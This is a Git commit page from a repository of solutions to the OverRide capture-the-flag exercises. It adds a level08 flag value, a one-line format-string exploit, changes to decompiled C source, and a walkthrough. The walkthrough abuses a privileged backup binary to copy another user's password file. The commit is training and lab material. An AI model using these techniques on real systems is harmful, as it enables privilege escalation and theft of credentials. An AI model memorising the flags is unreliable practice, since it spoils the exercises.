starnakin/42_override
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

level05: done (exploit modified to a better shellcode)

Browse Source 
level07: walkthrough done
level08: done
level09: done
This commit is contained in:
0x35c
2025-05-15 14:00:44 +02:00
parent 4a88b55e23
commit a3ea938eb1
12 changed files with 74 additions and 29 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
level08/flag Normal file
View File

@ -0,0 +1 @@
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S

1
level08/ressources/exploit Normal file
View File

@ -0,0 +1 @@
(python -c 'print "\x10\x98\x04\x08" + "%16930112p" + "%12$n"'; cat) | ./level4

10
level08/source.c
View File

@ -20,10 +20,8 @@ int main(int argc, const char **argv, const char **envp)
FILE *log;
FILE *stream;
int fd;
char buf;
char dest[104];
buf = -1;
if (argc != 2)
printf("Usage: %s filename\n", *argv);
log = fopen("./backups/.log", "w");
@ -44,11 +42,11 @@ int main(int argc, const char **argv, const char **envp)
printf("ERROR: Failed to open %s%s\n", "./backups/", argv[1]);
exit(1);
}
while (1) {
buf = fgetc(stream);
if (buf == -1)
for (size_t i = 0; i < sizeof(dest); i++) {
char c = fgetc(stream);
if (c == -1)
break;
write(fd, &buf, 1);
dest[i] = c;
}
log_wrapper(log, "Finished back up ", argv[1]);
fclose(stream);

16
level08/walkthrough Normal file
View File

@ -0,0 +1,16 @@
# Level08
Using ghidra, we can decompile the code and see that it does a backup of a file that we passed as a parameter (roughly).
However, there are a few protections.
First, the program `open()` our argument file (here, we want `/home/users/level09/.pass`.
Since the binary has the permission for user `level09`, we can `open()` this file.
The string `"./backups"` is concatenated to the filepath we pass as a parameter. It will then `open(..., OCREAT ...)` the file that we passed in `av[1]` and write the contents of the original file to this newly created file.
However, since the path will have `"./backups"` at the beginning and we want to get the content of `/home/users/level09/.pass`, we need to recreate this file tree in the `/tmp` directory.
Here is the process:
```
level08@OverRide:/tmp$ mkdir -p backups/home/users/level09
level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
```